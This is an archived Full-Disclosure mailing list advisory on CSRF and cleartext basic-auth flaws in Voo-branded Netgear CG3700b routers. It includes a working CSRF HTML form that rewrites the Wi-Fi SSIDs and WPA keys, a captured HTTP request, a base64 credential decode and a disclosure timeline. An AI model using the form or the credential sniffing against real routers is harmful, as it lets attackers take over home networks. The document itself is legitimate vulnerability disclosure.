lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <4c59417ffd9ce684bc2f6f80f7d3521c.squirrel@email.fatcow.com> Date: Tue, 26 Apr 2016 07:10:35 -0400 From: dev@...ler.net To: fulldisclosure@...lists.org Subject: [FD] Multiple Vulnerabilities in Voo branded Netgear CG3700b CVEs pending, screenshots and further examples available soon on my site. Cross-Site Request Forgery (CSRF) on all form POSTs --------------------------------------------------------------------------------- The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack on all configuration setting (/goform/<settingspage>) page POST requests. By tricking a user into following a specially crafted link, an attacker can modify all settings including WEP/WPA/WPA2 keys, restore the router to factory settings, or even upload an entire malicious configuration file. Example: <form method="POST" name="form0" action="http://192.168.0.1/goform/index" <input type="hidden" name="group_parametrage_wifi" value="active"> <input type="hidden" name="reseau_wifi_name" value="NEWSSID"> <input type="hidden" name="nom_select" value="AUTO-PSK"> <input type="hidden" name="canal" value=0> <input type="hidden" name="mot_de_passe" value="NEWWPAKEY"> <input type="hidden" name="NBandwidth" value=20> <input type="hidden" name="group_parametrage_wifi_an" value="active"> <input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G"> <input type="hidden" name="nom_select_an" value="AUTO-PSK"> <input type="hidden" name="canal_an" value=0> <input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G"> <input type="hidden" name="NBandwidth_an" value=20> <input type="hidden" name="group_fon" value="desactiver"> <input type="hidden" name="buttonApply" value=1> <input type="hidden" name="only_mode" value=0> <input type="hidden" name="selected_ch_an" value=1> </form> Insufficient Authentication (OWASP-A2) ----------------------------------------------------------- This same modem handles authentication via basic authentication over the default (HTTP, non-ssl) connection. This allows an attacker to easily decode the base64 encoded username and password, and authenticate to the router. This only requires an attacker be on the same network as the router, and sniff the clear-text traffic. Example: POST http://192.168.0.1/goform/parametre_config HTTP/1.1 Host: 192.168.0.1 Connection: keep-alive Content-Length: 24721 Cache-Control: max-age=0 Authorization: Basic dm9vOlBBU1NXT1JE root@...i:~# cat voo.txt dm9vOlBBU1NXT1JE root@...i:~# base64 --decode voo.txt voo:PASSWORD Disclosure Timeline ----------------------------- 22 Jan - discovered vulnerability, initially notified vendor 23 Jan - requested CVE 7 Mar - contacted vendor again, was notified that this will not be fixed at this time 20 April - attempted to contact Mitre again to receive CVE 21 April - sent to Full Disclosure 23 April - additional information (tentatively) posted to http://www.doyler.net 26 April - resending to Full Disclosure due to some errors _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists